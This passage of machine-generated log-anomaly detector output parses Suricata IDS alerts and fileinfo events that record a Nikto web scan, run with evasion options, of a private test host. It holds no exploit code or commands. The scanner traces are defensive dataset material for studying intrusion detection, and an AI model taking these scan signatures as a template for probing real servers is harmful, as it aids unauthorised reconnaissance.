"/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":630883435031917,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 630883435031917, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.342355+0000\",\"flow_id\":630883435031917,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.343787 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46938 -> 192.168.10.154:80", "/parser/model/time": 1583349514.343787, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46938, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.343787 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46938 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.ncf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.343942+0000\",\"flow_id\":2066313044966357,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.343942, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2066313044966357,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.ncf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.ncf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.ncf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.ncf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46938, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2066313044966357,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2066313044966357, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.343942+0000\",\"flow_id\":2066313044966357,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.345338 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46940 -> 192.168.10.154:80", "/parser/model/time": 1583349514.345338, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46940, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.345338 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46940 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.Htm", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.345637+0000\",\"flow_id\":1697602987508313,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.345637, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1697602987508313,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.Htm\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.Htm\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.Htm", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.Htm", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46940, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1697602987508313,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1697602987508313, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.345637+0000\",\"flow_id\":1697602987508313,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.347250 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46942 -> 192.168.10.154:80", "/parser/model/time": 1583349514.34725, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46942, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.347250 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46942 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.csc", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.347570+0000\",\"flow_id\":1217064866564597,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.34757, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1217064866564597,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.csc\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.csc\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.csc", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.csc", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": 